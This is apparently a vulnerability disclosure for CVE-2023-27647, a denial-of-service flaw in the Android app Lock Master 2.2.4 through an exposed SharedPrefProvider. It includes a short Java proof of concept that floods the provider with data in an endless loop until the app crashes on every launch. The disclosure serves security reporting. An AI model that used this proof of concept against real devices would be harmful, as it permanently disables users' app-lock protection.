Headline
CVE-2023-27647: SODA/CVE detail.md at main · LianKee/SODA
An issue found in DUALSPACE Lock Master v.2.2.4 allows a local attacker to cause a denial of service or gain sensitive information via the com.ludashi.superlock.util.pref.SharedPrefProviderEntryMethod: insert of the android.net.Uri.insert method.
Denial of Service exists in Lock Master(CVE-2023-27647)
Vendor:DUALSPACE(http://www.dualspace.com/pc/en/products.html)
Affected product:Lock Master (com.ludashi.superlock)
Version:2.2.4
Download link:https://app-lock-master.en.uptodown.com/android/download
Description of the vulnerability for use in the CVE:An issue found in DUALSPACE Lock Master v.2.2.4 allows a local attacker to cause a denial of service or gain sensitive information via the com.ludashi.superlock.util.pref.SharedPrefProvider EntryMethod: insert of the android.net.Uri.insert method.
Additional information:Lock Master is a security app, which can block access to user’s apps or files with lock patterns. Upon opening the app, it loads the SharedPreference files into memory. If a malicious app injects a large amount of data into these files, the Lock Master app will load excessive data into memory, which can trigger an OOM error and cause the app to crash. Even worse, simply restarting the app will not fix the security issue, as the injected data is persistent in the SharedPreference files. In practice, this means that the Lock Master app becomes unable to launch successfully.
poc:
ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
Uri uri = Uri.parse(“content://com.ludashi.superlock.main.SharedPrefProvider”);
ContentValues contentValues = new ContentValues();
while(true){
contentValues.put(“file_name","key_local_locked_apps”);
contentValues.put("type",4);
contentValues.put("key",randomString);
contentValues.put("value",randomString);
contentResolver.insert(uri, contentValues);
}